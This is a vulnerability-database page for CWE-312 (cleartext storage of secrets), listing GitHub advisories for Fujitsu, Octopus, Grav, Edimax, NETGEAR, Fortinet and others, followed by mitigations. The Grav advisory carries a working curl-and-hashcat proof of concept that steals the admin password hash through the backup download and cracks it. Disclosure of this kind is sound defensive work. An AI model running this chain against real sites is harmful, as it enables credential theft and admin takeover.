Common Weakness Enumeration

CWE-312

Allowed

Cleartext Storage of Sensitive Information

Abstraction: Base · Status: Draft

The product stores sensitive information in cleartext within a resource that might be accessible to another control sphere.

1017 vulnerabilities reference this CWE, most recent first.

GHSA-28JW-278J-42F5

Vulnerability from github – Published: 2023-08-04 12:30 – Updated: 2024-04-04 06:33
VLAI
Details

Fujitsu Software Infrastructure Manager (ISM) stores sensitive information at the product's maintenance data (ismsnap) in cleartext form. As a result, the password for the proxy server that is configured in ISM may be retrieved. Affected products and versions are as follows: Fujitsu Software Infrastructure Manager Advanced Edition V2.8.0.060, Fujitsu Software Infrastructure Manager Advanced Edition for PRIMEFLEX V2.8.0.060, and Fujitsu Software Infrastructure Manager Essential Edition V2.8.0.060.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-39379"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-312"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-08-04T10:15:09Z",
    "severity": "HIGH"
  },
  "details": "Fujitsu Software Infrastructure Manager (ISM) stores sensitive information at the product\u0027s maintenance data (ismsnap) in cleartext form. As a result, the password for the proxy server that is configured in ISM may be retrieved. Affected products and versions are as follows: Fujitsu Software Infrastructure Manager Advanced Edition V2.8.0.060, Fujitsu Software Infrastructure Manager Advanced Edition for PRIMEFLEX V2.8.0.060, and Fujitsu Software Infrastructure Manager Essential Edition V2.8.0.060.\n",
  "id": "GHSA-28jw-278j-42f5",
  "modified": "2024-04-04T06:33:46Z",
  "published": "2023-08-04T12:30:21Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39379"
    },
    {
      "type": "WEB",
      "url": "https://jvn.jp/en/jp/JVN38847224"
    },
    {
      "type": "WEB",
      "url": "https://support.ts.fujitsu.com/IndexProdSecurity.asp?lng=en"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-2986-5HCF-CM8G

Vulnerability from github – Published: 2022-01-20 00:01 – Updated: 2022-01-27 00:03
VLAI
Details

When the Windows Tentacle docker image starts up it logs all the commands that it runs along with the arguments, which writes the Octopus Server API key in plaintext. This does not affect the Linux Docker image

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-31821"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-312"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-01-19T06:15:00Z",
    "severity": "MODERATE"
  },
  "details": "When the Windows Tentacle docker image starts up it logs all the commands that it runs along with the arguments, which writes the Octopus Server API key in plaintext. This does not affect the Linux Docker image",
  "id": "GHSA-2986-5hcf-cm8g",
  "modified": "2022-01-27T00:03:36Z",
  "published": "2022-01-20T00:01:51Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-31821"
    },
    {
      "type": "WEB",
      "url": "https://advisories.octopus.com/post/2022/sa2022-01"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-2F86-9CP8-6HCF

Vulnerability from github – Published: 2026-06-18 14:31 – Updated: 2026-06-18 14:31
VLAI
Summary
Grav: Admin Backup Zip File Exposes Account Credentials and Configuration Secrets
Details

Summary

An authenticated administrator with backup permissions can download a ZIP archive containing the full Grav installation root, including user/accounts/admin.yaml with the admin's bcrypt password hash and email, plus user/config/ with all site configuration. The download endpoint requires only the session-static admin-nonce in the URL, no additional form-level CSRF token, and reveals the server's full filesystem path in a Base64-encoded query parameter. Combined with the absence of login rate limiting on http://{Grav_URL}/admin, an attacker who obtains a single admin-nonce value (via Referrer leakage, browser history, or XSS) can exfiltrate password hashes for offline cracking and achieve account takeover.

Details

The vulnerability chain spans three components in the deployed Grav source tree at /var/www/html/grav/:

1. Backup archive scope — Backups::backup()
/var/www/html/grav/system/src/Grav/Common/Backup/Backups.php:201-272

The backup() static method creates a ZIP of the directory specified by the backup profile's root property. The default profile (ID 0, named default_site_backup) backs up the entire Grav root directory. On line 225, when the root is not a stream URI, it falls back to the full installation path:

// Backups.php:225
$backup_root = rtrim(GRAV_ROOT . $backup->root, DS) ?: DS;

Since the default profile ships with no root override, $backup->root is empty, making $backup_root equal to GRAV_ROOT — i.e. /var/www/html/grav/. The archive therefore captures the entire installation including:

  • /var/www/html/grav/user/accounts/ — admin password hash, email, full name, granular permissions
  • /var/www/html/grav/user/config/ — system settings, potentially email SMTP credentials

The exclude_files and exclude_paths options on lines 232-235 are empty by default and offer no protection against including account files.

2. Backup download handler — AdminController::taskBackup()
/var/www/html/grav/user/plugins/admin/classes/plugin/AdminController.php:517-573

After creating the backup ZIP, the controller Base64-encodes the full filesystem path and embeds it directly in a download URL displayed to the admin:

// AdminController.php:558-560
$download = urlencode(base64_encode($backup));
$url = rtrim(...) . '/task' . $param_sep . 'backup/download' . $param_sep
       . $download . '/admin-nonce' . $param_sep . Utils::getNonce('admin-form');

The download handler (lines 532-541) decodes the path, locates the file via the backup:// stream, and serves it with Utils::download($file, true). It performs only two checks: the filename must end in .zip and the file must actually exist. It does not verify the file belongs to the requesting user, does not enforce a form-level nonce, and does not tie the download to a specific session.

3. Nonce validation — permissive
The backup route is protected only by the admin-nonce parameter appended to the URL path. This nonce is session-static and shared across every admin page. No form-nonce is required — unlike page saves or configuration changes which demand both admin-nonce and form-nonce. This makes the backup download exploitable via a single crafted GET request from any attacker who knows the nonce value.

PoC

Prerequisites: Admin session with valid admin-nonce.

Step 1 — Authenticate and extract the session-static nonces:

# Get login page, extract login-nonce, authenticate
NONCE=$(curl -s -c /tmp/jar "http://127.0.0.1/grav/admin" \
  | grep -oP 'name="login-nonce" value="\K[^"]+')
curl -s -b /tmp/jar -c /tmp/jar -X POST "http://127.0.0.1/grav/admin" \
  --data-urlencode "data[username]=admin" \
  --data-urlencode "data[password]=Passw0rd123!" \
  --data-urlencode "task=login" \
  --data-urlencode "login-nonce=${NONCE}"

# Extract the admin-nonce (same value on every admin page)
ADMIN_NONCE=$(curl -s -b /tmp/jar "http://127.0.0.1/grav/admin" \
  | grep -oP 'admin-nonce[:=]\K[a-f0-9]+' | head -1)
echo "Admin nonce: $ADMIN_NONCE"   # e.g. 68d6b108bc1398028365fb35ea760baf

Step 2 — Trigger a backup (single GET, no form-nonce needed):

curl -s -b /tmp/jar \
  "http://127.0.0.1/grav/admin/tools/backups.json/task:backup/admin-nonce:${ADMIN_NONCE}"

Response:

{
  "status": "success",
  "message": "Your backup is ready for download. <a href=\"/grav/admin/task:backup/download:L3Zhci93d3cvaHRtbC9ncmF2L2JhY2t1cC9kZWZhdWx0X3NpdGVfYmFja3VwLS0yMDI2MDYxNjEyMjQ0OS56aXA=/admin-nonce:68d6b108...\" class=\"button\">Download backup</a>"
}

Step 3 — Extract the Base64 download token and fetch the ZIP:

# The download path is base64("/var/www/html/grav/backup/default_site_backup--20260616122449.zip")
# This reveals the full server filesystem path.
curl -s -b /tmp/jar -o /tmp/backup.zip \
  "http://127.0.0.1/grav/admin/task:backup/download:L3Zhci93d3cvaHRtbC9ncmF2L2JhY2t1cC9kZWZhdWx0X3NpdGVfYmFja3VwLS0yMDI2MDYxNjEyMjQ0OS56aXA=/admin-nonce:${ADMIN_NONCE}"

Step 4 — Extract the password hash from the ZIP:

unzip -p /tmp/backup.zip "user/accounts/admin.yaml"

Output:

state: enabled
email: admin@grav.com
fullname: 'Grav Admin'
title: Administrator
access:
  admin:
    login: true
    super: true
  site:
    login: true
hashed_password: $2y$12$8StgOltcNbU5JD.D9Y5LmerDs.XBwLy5vSO3/9ReDYHjbv/aZTZ3m

Step 5 — Crack the bcrypt hash offline:

echo '$2y$12$8StgOltcNbU5JD.D9Y5LmerDs.XBwLy5vSO3/9ReDYHjbv/aZTZ3m' > hash.txt
hashcat -m 3200 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

Step 6 — Log in with the cracked password (no rate limit):

curl -s -b /tmp/jar -c /tmp/jar -X POST "http://127.0.0.1/grav/admin" \
  --data-urlencode "data[username]=admin" \
  --data-urlencode "data[password]=<cracked_password>" \
  --data-urlencode "task=login" \
  --data-urlencode "login-nonce=${NONCE}"

Impact

  • Type: Authenticated sensitive data exposure enabling offline credential theft
  • Attack surface: Any actor who can obtain admin-nonce (session fixation, reflected XSS, Referrer header leakage, browser history inspection, or proxy log access)
  • Exposed data: Admin username, email, full name, granular permission structure, bcrypt password hash ($2y$12$...), and full site configuration from user/config/
  • Downstream risk: Offline hashcat cracking bypasses all server-side brute-force protections. With no login rate limiting (Finding 1), a cracked hash grants immediate unrestricted admin access including file modification and arbitrary code execution potential through Twig/themes
  • Server path leakage: The Base64-encoded download token reveals the absolute filesystem path /var/www/html/grav/backup/ — information critical for LFI, file-write, and path traversal attacks
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "getgrav/grav"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.7.53"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-55885"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-312",
      "CWE-522"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-18T14:31:13Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\nAn authenticated administrator with backup permissions can download a ZIP archive containing the full Grav installation root, including `user/accounts/admin.yaml` with the admin\u0027s bcrypt password hash and email, plus `user/config/` with all site configuration. The download endpoint requires only the session-static `admin-nonce` in the URL, no additional form-level CSRF token, and reveals the server\u0027s full filesystem path in a Base64-encoded query parameter. Combined with the absence of login rate limiting on `http://{Grav_URL}/admin`, an attacker who obtains a single admin-nonce value (via Referrer leakage, browser history, or XSS) can exfiltrate password hashes for offline cracking and achieve account takeover.\n\n### Details\nThe vulnerability chain spans three components in the deployed Grav source tree at `/var/www/html/grav/`:\n\n**1. Backup archive scope \u2014 `Backups::backup()`**  \n`/var/www/html/grav/system/src/Grav/Common/Backup/Backups.php:201-272`\n\nThe `backup()` static method creates a ZIP of the directory specified by the backup profile\u0027s `root` property. The default profile (ID `0`, named `default_site_backup`) backs up the entire Grav root directory. On line 225, when the root is not a stream URI, it falls back to the full installation path:\n\n```php\n// Backups.php:225\n$backup_root = rtrim(GRAV_ROOT . $backup-\u003eroot, DS) ?: DS;\n```\n\nSince the default profile ships with no `root` override, `$backup-\u003eroot` is empty, making `$backup_root` equal to `GRAV_ROOT` \u2014 i.e. `/var/www/html/grav/`. The archive therefore captures the entire installation including:\n\n- `/var/www/html/grav/user/accounts/` \u2014 admin password hash, email, full name, granular permissions\n- `/var/www/html/grav/user/config/` \u2014 system settings, potentially email SMTP credentials\n\nThe `exclude_files` and `exclude_paths` options on lines 232-235 are empty by default and offer no protection against including account files.\n\n**2. Backup download handler \u2014 `AdminController::taskBackup()`**  \n`/var/www/html/grav/user/plugins/admin/classes/plugin/AdminController.php:517-573`\n\nAfter creating the backup ZIP, the controller Base64-encodes the full filesystem path and embeds it directly in a download URL displayed to the admin:\n\n```php\n// AdminController.php:558-560\n$download = urlencode(base64_encode($backup));\n$url = rtrim(...) . \u0027/task\u0027 . $param_sep . \u0027backup/download\u0027 . $param_sep\n       . $download . \u0027/admin-nonce\u0027 . $param_sep . Utils::getNonce(\u0027admin-form\u0027);\n```\n\nThe download handler (lines 532-541) decodes the path, locates the file via the `backup://` stream, and serves it with `Utils::download($file, true)`. It performs only two checks: the filename must end in `.zip` and the file must actually exist. It does **not** verify the file belongs to the requesting user, does **not** enforce a form-level nonce, and does **not** tie the download to a specific session.\n\n**3. Nonce validation \u2014 permissive**  \nThe backup route is protected only by the `admin-nonce` parameter appended to the URL path. This nonce is session-static and shared across every admin page. No `form-nonce` is required \u2014 unlike page saves or configuration changes which demand both `admin-nonce` and `form-nonce`. This makes the backup download exploitable via a single crafted GET request from any attacker who knows the nonce value.\n\n### PoC\n**Prerequisites:** Admin session with valid `admin-nonce`.\n\n**Step 1 \u2014 Authenticate and extract the session-static nonces:**\n```bash\n# Get login page, extract login-nonce, authenticate\nNONCE=$(curl -s -c /tmp/jar \"http://127.0.0.1/grav/admin\" \\\n  | grep -oP \u0027name=\"login-nonce\" value=\"\\K[^\"]+\u0027)\ncurl -s -b /tmp/jar -c /tmp/jar -X POST \"http://127.0.0.1/grav/admin\" \\\n  --data-urlencode \"data[username]=admin\" \\\n  --data-urlencode \"data[password]=Passw0rd123!\" \\\n  --data-urlencode \"task=login\" \\\n  --data-urlencode \"login-nonce=${NONCE}\"\n\n# Extract the admin-nonce (same value on every admin page)\nADMIN_NONCE=$(curl -s -b /tmp/jar \"http://127.0.0.1/grav/admin\" \\\n  | grep -oP \u0027admin-nonce[:=]\\K[a-f0-9]+\u0027 | head -1)\necho \"Admin nonce: $ADMIN_NONCE\"   # e.g. 68d6b108bc1398028365fb35ea760baf\n```\n\n**Step 2 \u2014 Trigger a backup (single GET, no form-nonce needed):**\n```bash\ncurl -s -b /tmp/jar \\\n  \"http://127.0.0.1/grav/admin/tools/backups.json/task:backup/admin-nonce:${ADMIN_NONCE}\"\n```\n\nResponse:\n```json\n{\n  \"status\": \"success\",\n  \"message\": \"Your backup is ready for download. \u003ca href=\\\"/grav/admin/task:backup/download:L3Zhci93d3cvaHRtbC9ncmF2L2JhY2t1cC9kZWZhdWx0X3NpdGVfYmFja3VwLS0yMDI2MDYxNjEyMjQ0OS56aXA=/admin-nonce:68d6b108...\\\" class=\\\"button\\\"\u003eDownload backup\u003c/a\u003e\"\n}\n```\n\n**Step 3 \u2014 Extract the Base64 download token and fetch the ZIP:**\n```bash\n# The download path is base64(\"/var/www/html/grav/backup/default_site_backup--20260616122449.zip\")\n# This reveals the full server filesystem path.\ncurl -s -b /tmp/jar -o /tmp/backup.zip \\\n  \"http://127.0.0.1/grav/admin/task:backup/download:L3Zhci93d3cvaHRtbC9ncmF2L2JhY2t1cC9kZWZhdWx0X3NpdGVfYmFja3VwLS0yMDI2MDYxNjEyMjQ0OS56aXA=/admin-nonce:${ADMIN_NONCE}\"\n```\n\n**Step 4 \u2014 Extract the password hash from the ZIP:**\n```bash\nunzip -p /tmp/backup.zip \"user/accounts/admin.yaml\"\n```\n\nOutput:\n```yaml\nstate: enabled\nemail: admin@grav.com\nfullname: \u0027Grav Admin\u0027\ntitle: Administrator\naccess:\n  admin:\n    login: true\n    super: true\n  site:\n    login: true\nhashed_password: $2y$12$8StgOltcNbU5JD.D9Y5LmerDs.XBwLy5vSO3/9ReDYHjbv/aZTZ3m\n```\n\n**Step 5 \u2014 Crack the bcrypt hash offline:**\n```bash\necho \u0027$2y$12$8StgOltcNbU5JD.D9Y5LmerDs.XBwLy5vSO3/9ReDYHjbv/aZTZ3m\u0027 \u003e hash.txt\nhashcat -m 3200 -a 0 hash.txt /usr/share/wordlists/rockyou.txt\n```\n\n**Step 6 \u2014 Log in with the cracked password (no rate limit):**\n```bash\ncurl -s -b /tmp/jar -c /tmp/jar -X POST \"http://127.0.0.1/grav/admin\" \\\n  --data-urlencode \"data[username]=admin\" \\\n  --data-urlencode \"data[password]=\u003ccracked_password\u003e\" \\\n  --data-urlencode \"task=login\" \\\n  --data-urlencode \"login-nonce=${NONCE}\"\n```\n\n### Impact\n- **Type:** Authenticated sensitive data exposure enabling offline credential theft\n- **Attack surface:** Any actor who can obtain admin-nonce (session fixation, reflected XSS, Referrer header leakage, browser history inspection, or proxy log access)\n- **Exposed data:** Admin username, email, full name, granular permission structure, bcrypt password hash (`$2y$12$...`), and full site configuration from `user/config/`\n- **Downstream risk:** Offline hashcat cracking bypasses all server-side brute-force protections. With no login rate limiting (Finding 1), a cracked hash grants immediate unrestricted admin access including file modification and arbitrary code execution potential through Twig/themes\n- **Server path leakage:** The Base64-encoded download token reveals the absolute filesystem path `/var/www/html/grav/backup/` \u2014 information critical for LFI, file-write, and path traversal attacks",
  "id": "GHSA-2f86-9cp8-6hcf",
  "modified": "2026-06-18T14:31:13Z",
  "published": "2026-06-18T14:31:13Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav/security/advisories/GHSA-2f86-9cp8-6hcf"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/getgrav/grav"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Grav: Admin Backup Zip File Exposes Account Credentials and Configuration Secrets"
}

GHSA-2F9J-FF2Q-8QMX

Vulnerability from github – Published: 2026-03-18 00:30 – Updated: 2026-03-18 00:30
VLAI
Details

Edimax GS-5008PL firmware version 1.00.54 and prior contain an insecure credential storage vulnerability that allows attackers to obtain administrator credentials by accessing configuration backup files. Attackers can download the config.bin file through fupload.cgi to extract plaintext username and password fields for unauthorized administrative access.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-32842"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-312"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-17T22:16:15Z",
    "severity": "HIGH"
  },
  "details": "Edimax GS-5008PL firmware version 1.00.54 and prior contain an insecure credential storage vulnerability that allows attackers to obtain administrator credentials by accessing configuration backup files. Attackers can download the config.bin file through fupload.cgi to extract plaintext username and password fields for unauthorized administrative access.",
  "id": "GHSA-2f9j-ff2q-8qmx",
  "modified": "2026-03-18T00:30:54Z",
  "published": "2026-03-18T00:30:54Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32842"
    },
    {
      "type": "WEB",
      "url": "https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/us/smb_legacy_switches/gs-5008pl"
    },
    {
      "type": "WEB",
      "url": "https://www.edimax.com/edimax/merchandise/merchandise_list/data/edimax/us/smb_legacy_products"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/edimax-gs-5008pl-admin-credentials-stored-in-cleartext"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-2G83-CG5Q-4FMJ

Vulnerability from github – Published: 2024-05-03 03:30 – Updated: 2024-05-03 03:30
VLAI
Details

NETGEAR RAX30 Device Configuration Cleartext Storage Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of NETGEAR RAX30 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.

The specific flaw exists within the handling of device configuration. The issue results from the storage of configuration secrets in plaintext. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-19841.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-27370"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-312"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-05-03T02:15:15Z",
    "severity": "MODERATE"
  },
  "details": "NETGEAR RAX30 Device Configuration Cleartext Storage Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of NETGEAR RAX30 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.\n\nThe specific flaw exists within the handling of device configuration. The issue results from the storage of configuration secrets in plaintext. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-19841.",
  "id": "GHSA-2g83-cg5q-4fmj",
  "modified": "2024-05-03T03:30:49Z",
  "published": "2024-05-03T03:30:49Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-27370"
    },
    {
      "type": "WEB",
      "url": "https://kb.netgear.com/000065619/Security-Advisory-for-Multiple-Vulnerabilities-on-the-RAX30-PSV-2022-0348"
    },
    {
      "type": "WEB",
      "url": "https://www.zerodayinitiative.com/advisories/ZDI-23-501"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-2H2G-HG5X-83G2

Vulnerability from github – Published: 2026-03-10 18:31 – Updated: 2026-03-10 18:31
VLAI
Details

A cleartext storage of sensitive information vulnerability [CWE-312] vulnerability in Fortinet FortiMail 7.6.0 through 7.6.2, FortiMail 7.4.0 through 7.4.4, FortiMail 7.2.0 through 7.2.7, FortiMail 7.0.0 through 7.0.8, FortiRecorder 7.2.0 through 7.2.3, FortiRecorder 7.0 all versions, FortiRecorder 6.4 all versions, FortiVoice 7.2.0, FortiVoice 7.0.0 through 7.0.6 may allow an authenticated malicious administrator to obtain user's secrets via CLI commands. Practical exploitability is limited by conditions out of the control of the attacker: An admin must log in to the targeted device.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-55717"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-312"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-10T18:17:58Z",
    "severity": "MODERATE"
  },
  "details": "A cleartext storage of sensitive information vulnerability [CWE-312] vulnerability in Fortinet FortiMail 7.6.0 through 7.6.2, FortiMail 7.4.0 through 7.4.4, FortiMail 7.2.0 through 7.2.7, FortiMail 7.0.0 through 7.0.8, FortiRecorder 7.2.0 through 7.2.3, FortiRecorder 7.0 all versions, FortiRecorder 6.4 all versions, FortiVoice 7.2.0, FortiVoice 7.0.0 through 7.0.6 may allow an authenticated malicious administrator to obtain user\u0027s secrets via CLI commands. Practical exploitability is limited by conditions out of the control of the attacker: An admin must log in to the targeted device.",
  "id": "GHSA-2h2g-hg5x-83g2",
  "modified": "2026-03-10T18:31:18Z",
  "published": "2026-03-10T18:31:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55717"
    },
    {
      "type": "WEB",
      "url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-080"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-2JRH-C5MC-7J55

Vulnerability from github – Published: 2024-07-09 21:30 – Updated: 2024-11-22 21:32
VLAI
Details

Linksys Velop Pro 6E 1.0.8 MX6200_1.0.8.215731 and 7 1.0.10.215314 devices send cleartext Wi-Fi passwords over the public Internet during app-based installation.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-40750"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-312"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-07-09T20:15:12Z",
    "severity": "MODERATE"
  },
  "details": "Linksys Velop Pro 6E 1.0.8 MX6200_1.0.8.215731 and 7 1.0.10.215314 devices send cleartext Wi-Fi passwords over the public Internet during app-based installation.",
  "id": "GHSA-2jrh-c5mc-7j55",
  "modified": "2024-11-22T21:32:11Z",
  "published": "2024-07-09T21:30:37Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-40750"
    },
    {
      "type": "WEB",
      "url": "https://news.ycombinator.com/item?id=40917312"
    },
    {
      "type": "WEB",
      "url": "https://stackdiary.com/linksys-velop-routers-send-wi-fi-passwords-in-plaintext-to-us-servers"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-2PPJ-9HHV-GRQQ

Vulnerability from github – Published: 2022-05-17 00:32 – Updated: 2024-02-14 18:30
VLAI
Details

SepCity Classified Ads stores the admin password in cleartext in data/classifieds.mdb, which allows context-dependent attackers to obtain sensitive information.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2008-6157"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-312"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2009-02-17T17:30:00Z",
    "severity": "MODERATE"
  },
  "details": "SepCity Classified Ads stores the admin password in cleartext in data/classifieds.mdb, which allows context-dependent attackers to obtain sensitive information.",
  "id": "GHSA-2ppj-9hhv-grqq",
  "modified": "2024-02-14T18:30:24Z",
  "published": "2022-05-17T00:32:59Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2008-6157"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/48822"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/7613"
    },
    {
      "type": "WEB",
      "url": "http://www.attrition.org/pipermail/vim/2009-February/002146.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-2V3R-QQR5-3X33

Vulnerability from github – Published: 2022-05-24 17:10 – Updated: 2022-05-24 17:10
VLAI
Details

If a user saved passwords before Thunderbird 60 and then later set a master password, an unencrypted copy of these passwords is still accessible. This is because the older stored password file was not deleted when the data was copied to a new format starting in Thunderbird 60. The new master password is added only on the new file. This could allow the exposure of stored password data outside of user expectations. This vulnerability affects Thunderbird < 68.5.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-6794"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-312",
      "CWE-522"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-03-02T05:15:00Z",
    "severity": "MODERATE"
  },
  "details": "If a user saved passwords before Thunderbird 60 and then later set a master password, an unencrypted copy of these passwords is still accessible. This is because the older stored password file was not deleted when the data was copied to a new format starting in Thunderbird 60. The new master password is added only on the new file. This could allow the exposure of stored password data outside of user expectations. This vulnerability affects Thunderbird \u003c 68.5.",
  "id": "GHSA-2v3r-qqr5-3x33",
  "modified": "2022-05-24T17:10:01Z",
  "published": "2022-05-24T17:10:01Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-6794"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1606619"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/202003-10"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/4328-1"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/4335-1"
    },
    {
      "type": "WEB",
      "url": "https://www.mozilla.org/security/advisories/mfsa2020-07"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-2V5P-GW86-2385

Vulnerability from github – Published: 2022-05-24 17:20 – Updated: 2022-05-24 17:20
VLAI
Details

A cleartext storage in a file or on disk (CWE-313) vulnerability in FortiOS SSL VPN 6.2.2 and below may allow an attacker to retrieve a logged-in SSL VPN user's credentials should that attacker be able to read the session file stored on the targeted device's system.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-17655"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-312"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-06-16T21:15:00Z",
    "severity": "MODERATE"
  },
  "details": "A cleartext storage in a file or on disk (CWE-313) vulnerability in FortiOS SSL VPN 6.2.2 and below may allow an attacker to retrieve a logged-in SSL VPN user\u0027s credentials should that attacker be able to read the session file stored on the targeted device\u0027s system.",
  "id": "GHSA-2v5p-gw86-2385",
  "modified": "2022-05-24T17:20:36Z",
  "published": "2022-05-24T17:20:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-17655"
    },
    {
      "type": "WEB",
      "url": "https://fortiguard.com/psirt/FG-IR-19-217"
    },
    {
      "type": "WEB",
      "url": "https://fortiguard.com/psirt/FG-IR-20-224"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

Mitigation
Implementation System Configuration Operation

When storing data in the cloud (e.g., S3 buckets, Azure blobs, Google Cloud Storage, etc.), use the provider's controls to encrypt the data at rest. [REF-1297] [REF-1299] [REF-1301]

Mitigation
Implementation System Configuration Operation

In some systems/environments such as cloud, the use of "double encryption" (at both the software and hardware layer) might be required, and the developer might be solely responsible for both layers, instead of shared responsibility with the administrator of the broader system/environment.

CAPEC-37: Retrieve Embedded Sensitive Data

An attacker examines a target system to find sensitive data that has been embedded within it. This information can reveal confidential contents, such as account numbers or individual keys/credentials that can be used as an intermediate step in a larger attack.